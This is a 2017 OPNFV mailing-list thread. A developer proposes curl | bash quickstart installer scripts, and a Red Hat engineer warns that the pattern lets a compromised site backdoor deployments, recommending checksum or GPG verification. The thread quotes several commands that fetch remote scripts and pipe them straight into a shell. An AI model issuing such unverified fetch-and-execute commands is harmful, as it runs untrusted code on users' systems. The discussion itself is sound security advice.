Some articles on risks: https://sysdig.com/blog/friends-dont-let-friends-curl-bash/
https://www.seancassidy.me/dont-pipe-to-your-shell.html https://sandstorm.io/news/2015-09-24-is-curl-bash-insecure-pgp-verified-install The safest way to do this is using GPG with --recv-key and --verify, I am sure with some creativity its possible to get it into one line. I believe rvm do this. On Fri, Jun 30, 2017 at 4:06 AM, liangqi (D) <[email protected]> wrote: > Thanks for pointing out this security issue. > > I think curl | bash install is the easiest way to deploying a system, and > with minimum dependency. Could you please some examples on how to use > checksum to insure the script is securely executed. > > I saw at the head of https://get.docker.com/ has the info like: > > ```bash > # This script is meant for quick & easy install via: > # $ curl -fsSL get.docker.com -o get-docker.sh > # $ sh get-docker.sh > # > # For test builds (ie. release candidates): > # $ curl -fsSL test.docker.com -o test-docker.sh > # $ sh test-docker.sh > # > # NOTE: Make sure to verify the contents of the script > # you downloaded matches the contents of install.sh > # located at https://github.com/docker/docker-install > # before executing. > ``` > > Best Regards, > Qi Liang > ------------------------------ > *From:* Luke Hinds [[email protected]] > *Sent:* Thursday, June 29, 2017 18:32 > *To:* liangqi (D) > *Cc:* [email protected]; [email protected]; > [email protected] > *Subject:* Re: [opnfv-tech-discuss] [Infra][Pharos][Releng][Octopus] > Proposal to implement installers' quickstart wrapper scripts > > Hi, > > Don't want to detract from the topic, but please do not use curl | bash, > its dangerous and if opnfv.org is every compromised, scripts like this > could be used to back door all the PODS and test sites deployed by end > users. > > If deploying a system this way, then use a checksum (with sha256 or > stronger) to first to insure the script has not been tampered with (I have > examples if some are needed). > > Cheers, > > Luke > > On Thu, Jun 29, 2017 at 10:54 AM, liangqi (D) <[email protected]> wrote: > >> Hi, >> >> In OPNFV we have 4 installers in Danube release, we will have more in the >> next release. Each of them supports multiple scenarios and has different >> install user steps. This is quite confusing and difficult to use, >> especially for the newbies. >> >> In releng we already have scripts to trigger all installers' deploy and >> test, but the scripts are CI oriented, not user oriented. >> >> So I proposal to implement wrapper scripts in releng to provide easy way >> for people to try opnfv. With minimum requirement(a server with Ubuntu >> 14.04/16.04 or CentOS7 installed and with internet connectivity), without >> checking detail installers' install guide, just run one command you will >> get your environment ready. >> >> The simplest way to install opnfv environment will be like: >> `curl https://get.opnfv.org/ephrates/quickstart.sh | bash`. >> >> For each installer we may have one command deploy like: >> `curl https://get.opnfv.org/ephrates/compass/quickstart.sh | bash` >> >> Basic virtual deploy workflows: >> >> 1. Run command (e.g. `curl https://get.opnfv.org/ephrates/quickstart.sh >> | bash`) >> 2. Check environment >> 3. Fetch supported installers and select one installer >> 4. Generate the deploy command and execute >> 5. Verify the deployed environment >> 6. Deploy success >> >> For BareMetal deployment the workflow are almost the same, the only >> different is you need prepare physical servers/switches, connect the >> cables, setup the switches, create a pod-descriptor file, and run the >> deploy command with the pod-descriptor file. >> >> The attached slide illustrate the initial idea, which was shared by >> Justin at the OPNFV Summit in Beijing. >> Here is the initial script patch: https://gerrit.opnfv.org/gerri >> t/#/c/36711/ >> >> @Uli, I saw you've sent the latest infra working group meeting agenda in >> the mailing list. Could you please include the topic to the infra working >> group meeting agenda. >> >> Welcome feedback, comments, discuss here or at the infra working group >> meeting. >> >> Best Regards, >> Qi Liang >> >> _______________________________________________ >> opnfv-tech-discuss mailing list >> [email protected] >> https://lists.opnfv.org/mailman/listinfo/opnfv-tech-discuss >> >> > > > -- > Luke Hinds | NFV Partner Engineering | Office of Technology | Red Hat > e: [email protected] | irc: lhinds @freenode | m: +44 77 45 63 98 84 | t: +44 > 12 52 36 2483 > -- Luke Hinds | NFV Partner Engineering | Office of Technology | Red Hat e: [email protected] | irc: lhinds @freenode | m: +44 77 45 63 98 84 | t: +44 12 52 36 2483
_______________________________________________ opnfv-tech-discuss mailing list [email protected] https://lists.opnfv.org/mailman/listinfo/opnfv-tech-discuss
